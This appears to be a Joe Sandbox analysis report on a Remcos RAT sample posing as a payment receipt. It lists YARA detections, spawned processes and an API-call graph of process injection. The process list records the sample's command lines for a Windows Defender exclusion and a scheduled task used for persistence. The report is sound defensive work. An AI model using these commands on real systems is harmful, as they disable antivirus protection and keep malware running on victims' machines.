                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                  Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:10:36:59
                                                  Start date:17/12/2024
                                                  Path:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe"
                                                  Imagebase:0x1c0000
                                                  File size:1'193'984 bytes
                                                  MD5 hash:1F0AE2753F131F73C2FE881C1C8E7C8F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:10:37:01
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe"
                                                  Imagebase:0x6a0000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:4
                                                  Start time:10:37:02
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:5
                                                  Start time:10:37:02
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp"
                                                  Imagebase:0xe0000
                                                  File size:187'904 bytes
                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:6
                                                  Start time:10:37:02
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:7
                                                  Start time:10:37:02
                                                  Start date:17/12/2024
                                                  Path:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe"
                                                  Imagebase:0xa00000
                                                  File size:1'193'984 bytes
                                                  MD5 hash:1F0AE2753F131F73C2FE881C1C8E7C8F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4508770334.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:false

                                                  General

                                                  Target ID:8
                                                  Start time:10:37:03
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                  Imagebase:0x7ff6ef0c0000
                                                  File size:496'640 bytes
                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:9
                                                  Start time:10:37:04
                                                  Start date:17/12/2024
                                                  Path:C:\Users\user\AppData\Roaming\eaJOpx.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Roaming\eaJOpx.exe
                                                  Imagebase:0x7d0000
                                                  File size:1'193'984 bytes
                                                  MD5 hash:1F0AE2753F131F73C2FE881C1C8E7C8F
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 34%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:10
                                                  Start time:10:37:06
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpD79C.tmp"
                                                  Imagebase:0xe0000
                                                  File size:187'904 bytes
                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:11
                                                  Start time:10:37:06
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:12
                                                  Start time:10:37:06
                                                  Start date:17/12/2024
                                                  Path:C:\Users\user\AppData\Roaming\eaJOpx.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\eaJOpx.exe"
                                                  Imagebase:0x4f0000
                                                  File size:1'193'984 bytes
                                                  MD5 hash:1F0AE2753F131F73C2FE881C1C8E7C8F
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2108090564.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:15
                                                  Start time:10:40:19
                                                  Start date:17/12/2024
                                                  Path:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\nxiitqhhpsbyad"
                                                  Imagebase:0x660000
                                                  File size:1'193'984 bytes
                                                  MD5 hash:1F0AE2753F131F73C2FE881C1C8E7C8F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:16
                                                  Start time:10:40:19
                                                  Start date:17/12/2024
                                                  Path:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\xrnatjradatdcsnha"
                                                  Imagebase:0xc0000
                                                  File size:1'193'984 bytes
                                                  MD5 hash:1F0AE2753F131F73C2FE881C1C8E7C8F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:17
                                                  Start time:10:40:19
                                                  Start date:17/12/2024
                                                  Path:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\xrnatjradatdcsnha"
                                                  Imagebase:0x470000
                                                  File size:1'193'984 bytes
                                                  MD5 hash:1F0AE2753F131F73C2FE881C1C8E7C8F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:18
                                                  Start time:10:40:20
                                                  Start date:17/12/2024
                                                  Path:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\atstubkcrjlqnyjljdoav"
                                                  Imagebase:0xb10000
                                                  File size:1'193'984 bytes
                                                  MD5 hash:1F0AE2753F131F73C2FE881C1C8E7C8F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:12.8%
                                                    Dynamic/Decrypted Code Coverage:98.8%
                                                    Signature Coverage:1.2%
                                                    Total number of Nodes:259
                                                    Total number of Limit Nodes:9
                                                    execution_graph 56093 6f4d9f4 56098 6f4a570 56093->56098 56102 6f4a568 56093->56102 56094 6f4d9ce 56094->56093 56095 6f4e01a 56094->56095 56099 6f4a5b8 WriteProcessMemory 56098->56099 56101 6f4a60f 56099->56101 56101->56094 56103 6f4a5b8 WriteProcessMemory 56102->56103 56105 6f4a60f 56103->56105 56105->56094 56321 58172c0 56322 58172ed 56321->56322 56341 5816fcc 56322->56341 56324 581734f 56325 5816fcc 2 API calls 56324->56325 56326 5817381 56325->56326 56327 5816fcc 2 API calls 56326->56327 56328 58173b3 56327->56328 56329 5816fcc 2 API calls 56328->56329 56330 58173e5 56329->56330 56346 5816fdc 56330->56346 56333 5816fdc 2 API calls 56334 5817449 56333->56334 56335 5816fdc 2 API calls 56334->56335 56336 581747b 56335->56336 56337 5816fdc 2 API calls 56336->56337 56338 58174ad 56337->56338 56339 5816fcc 2 API calls 56338->56339 56340 58174df 56339->56340 56342 5816fd7 56341->56342 56344 23e7678 2 API calls 56342->56344 56345 23e8c51 2 API calls 56342->56345 56343 5818c73 56343->56324 56344->56343 56345->56343 56347 5816fe7 56346->56347 56348 581712c 2 API calls 56347->56348 56349 5817417 56348->56349 56349->56333 56135 6f4e4d0 56136 6f4e65b 56135->56136 56138 6f4e4f6 56135->56138 56138->56136 56139 6f49ce0 56138->56139 56140 6f4e750 PostMessageW 56139->56140 56141 6f4e7bc 56140->56141 56141->56138 56350 6f4a4b0 56351 6f4a4f0 VirtualAllocEx 56350->56351 56353 6f4a52d 56351->56353 56142 9dd1b4 56143 9dd1cc 56142->56143 56144 9dd226 56143->56144 56149 5812cf9 56143->56149 56158 5810bac 56143->56158 56167 5811fa8 56143->56167 56171 5811f99 56143->56171 56150 5812d08 56149->56150 56151 5812d69 56150->56151 56153 5812d59 56150->56153 56188 5810cd4 56151->56188 56175 5812e80 56153->56175 56179 5812f5c 56153->56179 56184 5812e90 56153->56184 56154 5812d67 56159 5810bb7 56158->56159 56160 5812d69 56159->56160 56162 5812d59 56159->56162 56161 5810cd4 CallWindowProcW 56160->56161 56163 5812d67 56161->56163 56164 5812e80 CallWindowProcW 56162->56164 56165 5812e90 CallWindowProcW 56162->56165 56166 5812f5c CallWindowProcW 56162->56166 56164->56163 56165->56163 56166->56163 56168 5811fce 56167->56168 56169 5810bac CallWindowProcW 56168->56169 56170 5811fef 56169->56170 56170->56144 56172 5811fce 56171->56172 56173 5810bac CallWindowProcW 56172->56173 56174 5811fef 56173->56174 56174->56144 56177 5812ea4 56175->56177 56176 5812f30 56176->56154 56192 5812f48 56177->56192 56180 5812f6a 56179->56180 56181 5812f1a 56179->56181 56183 5812f48 CallWindowProcW 56181->56183 56182 5812f30 56182->56154 56183->56182 56186 5812ea4 56184->56186 56185 5812f30 56185->56154 56187 5812f48 CallWindowProcW 56186->56187 56187->56185 56189 5810cdf 56188->56189 56190 581444a CallWindowProcW 56189->56190 56191 58143f9 56189->56191 56190->56191 56191->56154 56193 5812f59 56192->56193 56195 5814380 56192->56195 56193->56176 56196 5810cd4 CallWindowProcW 56195->56196 56197 581439a 56196->56197 56197->56193 56198 5a50888 56202 5a508b8 56198->56202 56207 5a508c8 56198->56207 56199 5a508a7 56203 5a508c8 56202->56203 56212 23e7678 56203->56212 56219 23e8c51 56203->56219 56204 5a5092c 56204->56199 56208 5a508f6 56207->56208 56210 23e7678 2 API calls 56208->56210 56211 23e8c51 2 API calls 56208->56211 56209 5a5092c 56209->56199 56210->56209 56211->56209 56213 23e7683 56212->56213 56215 23e8f13 56213->56215 56226 23eb1c1 56213->56226 56214 23e8f51 56214->56204 56215->56214 56230 23ed288 56215->56230 56235 23ed298 56215->56235 56220 23e8c8b 56219->56220 56222 23e8f13 56220->56222 56225 23eb1c1 GetModuleHandleW 56220->56225 56221 23e8f51 56221->56204 56222->56221 56223 23ed298 2 API calls 56222->56223 56224 23ed288 2 API calls 56222->56224 56223->56221 56224->56221 56225->56222 56240 23eb1f8 56226->56240 56243 23eb1e8 56226->56243 56227 23eb1d6 56227->56215 56231 23ed2b9 56230->56231 56232 23ed2dd 56231->56232 56252 23ed448 56231->56252 56256 23ed437 56231->56256 56232->56214 56236 23ed2b9 56235->56236 56237 23ed2dd 56236->56237 56238 23ed448 2 API calls 56236->56238 56239 23ed437 2 API calls 56236->56239 56237->56214 56238->56237 56239->56237 56247 23eb2e0 56240->56247 56241 23eb207 56241->56227 56244 23eb1f8 56243->56244 56246 23eb2e0 GetModuleHandleW 56244->56246 56245 23eb207 56245->56227 56246->56245 56248 23eb301 56247->56248 56249 23eb324 56247->56249 56248->56249 56250 23eb528 GetModuleHandleW 56248->56250 56249->56241 56251 23eb555 56250->56251 56251->56241 56253 23ed455 56252->56253 56254 23ed48f 56253->56254 56260 23ecfa8 56253->56260 56254->56232 56257 23ed455 56256->56257 56258 23ed48f 56257->56258 56259 23ecfa8 2 API calls 56257->56259 56258->56232 56259->56258 56261 23ecfad 56260->56261 56262 23edda0 56261->56262 56264 23ed0d4 56261->56264 56265 23ed0df 56264->56265 56266 23e7678 2 API calls 56265->56266 56267 23ede0f 56266->56267 56271 23efb70 56267->56271 56275 23efb58 56267->56275 56268 23ede49 56268->56262 56272 23efba1 56271->56272 56273 23efbad 56271->56273 56272->56273 56279 5810eb8 56272->56279 56273->56268 56276 23efba1 56275->56276 56277 23efbad 56275->56277 56276->56277 56278 5810eb8 CreateWindowExW 56276->56278 56277->56268 56278->56277 56280 5810ee3 56279->56280 56281 5810f92 56280->56281 56284 5811da0 56280->56284 56287 5811c90 56280->56287 56291 5810b80 56284->56291 56288 5811ce2 56287->56288 56289 5810b80 CreateWindowExW 56288->56289 56290 5811dd5 56289->56290 56290->56281 56292 5811df0 CreateWindowExW 56291->56292 56294 5811f14 56292->56294 56294->56294 56295 6ef0040 56296 6ef008e DrawTextExW 56295->56296 56298 6ef00e6 56296->56298 56354 6f4d9a6 56355 6f4d9b6 56354->56355 56357 6f4a570 WriteProcessMemory 56355->56357 56358 6f4a568 WriteProcessMemory 56355->56358 56356 6f4de2d 56357->56356 56358->56356 56106 6f4d867 56107 6f4d8ab 56106->56107 56114 6f49fa0 56107->56114 56118 6f49f99 56107->56118 56108 6f4d77e 56109 6f4df8b 56108->56109 56122 6f49ae0 56108->56122 56126 6f49ae8 56108->56126 56115 6f49fe5 Wow64SetThreadContext 56114->56115 56117 6f4a02d 56115->56117 56117->56108 56119 6f49fe5 Wow64SetThreadContext 56118->56119 56121 6f4a02d 56119->56121 56121->56108 56123 6f49b28 ResumeThread 56122->56123 56125 6f49b59 56123->56125 56125->56108 56127 6f49b28 ResumeThread 56126->56127 56129 6f49b59 56127->56129 56129->56108 56299 6f4df47 56300 6f4df6c 56299->56300 56303 6f4a660 56299->56303 56307 6f4a659 56299->56307 56304 6f4a6ab ReadProcessMemory 56303->56304 56306 6f4a6ef 56304->56306 56306->56300 56308 6f4a6ab ReadProcessMemory 56307->56308 56310 6f4a6ef 56308->56310 56310->56300 56359 23e4668 56360 23e467a 56359->56360 56363 23e4686 56360->56363 56365 23e4779 56360->56365 56362 23e46a5 56370 23e3e28 56363->56370 56366 23e479d 56365->56366 56374 23e4878 56366->56374 56378 23e4888 56366->56378 56371 23e3e33 56370->56371 56386 23e5c84 56371->56386 56373 23e7037 56373->56362 56376 23e4888 56374->56376 56375 23e498c 56376->56375 56382 23e44b0 56376->56382 56380 23e48af 56378->56380 56379 23e498c 56380->56379 56381 23e44b0 CreateActCtxA 56380->56381 56381->56379 56383 23e5918 CreateActCtxA 56382->56383 56385 23e59db 56383->56385 56387 23e5c8f 56386->56387 56390 23e5e5c 56387->56390 56389 23e7acd 56389->56373 56391 23e5e67 56390->56391 56394 23e7648 56391->56394 56393 23e7ba2 56393->56389 56395 23e7653 56394->56395 56396 23e7678 2 API calls 56395->56396 56397 23e7ca5 56396->56397 56397->56393 56398 6f4d6af 56402 6f4a7ec 56398->56402 56406 6f4a7f8 56398->56406 56403 6f4a7f8 CreateProcessA 56402->56403 56405 6f4aa43 56403->56405 56407 6f4a881 CreateProcessA 56406->56407 56409 6f4aa43 56407->56409 56409->56409 56410 6f4deaf 56411 6f4de74 56410->56411 56411->56410 56412 6f49fa0 Wow64SetThreadContext 56411->56412 56413 6f49f99 Wow64SetThreadContext 56411->56413 56412->56411 56413->56411 56311 5819abf 56312 5819acb 56311->56312 56315 5819a5f 56311->56315 56316 581712c 56312->56316 56314 5819adf 56317 5817137 56316->56317 56318 5819b12 56317->56318 56319 23e7678 2 API calls 56317->56319 56320 23e8c51 2 API calls 56317->56320 56318->56314 56319->56318 56320->56318 56414 23ed560 56415 23ed5a6 56414->56415 56419 23ed738 56415->56419 56422 23ed740 56415->56422 56416 23ed693 56425 23ed070 56419->56425 56423 23ed76e 56422->56423 56424 23ed070 DuplicateHandle 56422->56424 56423->56416 56424->56423 56426 23ed7a8 DuplicateHandle 56425->56426 56427 23ed76e 56426->56427 56427->56416 56428 6efda10 56429 6efda58 VirtualProtect 56428->56429 56430 6efda92 56429->56430

                                                    Executed Functions

                                                    Function 06EF8AC9 Relevance: 4.1, Strings: 3, Instructions: 393COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 401 6ef8ac9 402 6ef8acb-6ef8acc 401->402 403 6ef8ace-6ef8af0 402->403 404 6ef8b4d 402->404 405 6ef8a74-6ef8ab0 403->405 406 6ef8af2-6ef8b20 403->406 407 6ef8b4f 404->407 408 6ef8b54-6ef8b92 call 6ef90d0 404->408 409 6ef8ab6-6ef8ac5 405->409 406->402 410 6ef8b22-6ef8b46 406->410 407->408 415 6ef8b98 408->415 409->409 412 6ef8ac7-6ef8ac8 409->412 410->404 412->405 416 6ef8b9f-6ef8bbb 415->416 417 6ef8bbd 416->417 418 6ef8bc4-6ef8bc5 416->418 417->415 419 6ef8ded-6ef8df1 417->419 420 6ef8cad-6ef8ccb 417->420 421 6ef8c0b-6ef8c14 417->421 422 6ef8eab-6ef8ed0 417->422 423 6ef8bca-6ef8bce 417->423 424 6ef8da3-6ef8db8 417->424 425 6ef8c40-6ef8c58 417->425 426 6ef8d1f-6ef8d31 417->426 427 6ef8eff-6ef8f16 417->427 428 6ef8dbd-6ef8dc1 417->428 429 6ef8e1d-6ef8e29 417->429 430 6ef8f1b-6ef8f22 417->430 431 6ef8d5b-6ef8d72 417->431 432 6ef8cfa-6ef8d1a 417->432 433 6ef8d77-6ef8d8c 417->433 434 6ef8bf7-6ef8c09 417->434 435 6ef8d36-6ef8d56 417->435 436 6ef8c96-6ef8ca8 417->436 437 6ef8ed5-6ef8ee1 417->437 438 6ef8d91-6ef8d9e 417->438 439 6ef8cd0-6ef8cdc 417->439 418->423 418->430 440 6ef8e04-6ef8e0b 419->440 441 6ef8df3-6ef8e02 419->441 420->416 448 6ef8c27-6ef8c2e 421->448 449 6ef8c16-6ef8c25 421->449 422->416 446 6ef8be1-6ef8be8 423->446 447 6ef8bd0-6ef8bdf 423->447 424->416 452 6ef8c5f-6ef8c75 425->452 453 6ef8c5a 425->453 426->416 427->416 454 6ef8dd4-6ef8ddb 428->454 455 6ef8dc3-6ef8dd2 428->455 442 6ef8e2b 429->442 443 6ef8e30-6ef8e46 429->443 431->416 432->416 433->416 434->416 435->416 436->416 450 6ef8ee8-6ef8efa 437->450 451 6ef8ee3 437->451 438->416 444 6ef8cde 439->444 445 6ef8ce3-6ef8cf5 439->445 456 6ef8e12-6ef8e18 440->456 441->456 442->443 470 6ef8e4d-6ef8e63 443->470 471 6ef8e48 443->471 444->445 445->416 457 6ef8bef-6ef8bf5 446->457 447->457 459 6ef8c35-6ef8c3b 448->459 449->459 450->416 451->450 468 6ef8c7c-6ef8c91 452->468 469 6ef8c77 452->469 453->452 458 6ef8de2-6ef8de8 454->458 455->458 456->416 457->416 458->416 459->416 468->416 469->468 474 6ef8e6a-6ef8e80 470->474 475 6ef8e65 470->475 471->470 477 6ef8e87-6ef8ea6 474->477 478 6ef8e82 474->478 475->474 477->416 478->477
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2073332929.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_6ef0000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ry$ry$ry
                                                    • API String ID: 0-128149707
                                                    • Opcode ID: eecd954c1d2e35864ac6f2eb86cd7e38668e459a24e047f57414ef4d7bcd561f
                                                    • Instruction ID: 06cf157b4c47144cc45c2b92b42908397c07e524b52dc8fbc4041964a865e338
                                                    • Opcode Fuzzy Hash: eecd954c1d2e35864ac6f2eb86cd7e38668e459a24e047f57414ef4d7bcd561f
                                                    • Instruction Fuzzy Hash: B8E1AC74E1630ADFDB44DFA6C8408EFBBB2FF89351B109569E501AB248D7359A42CF90
                                                    Function 06EF654D Relevance: 4.0, Strings: 3, Instructions: 295COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
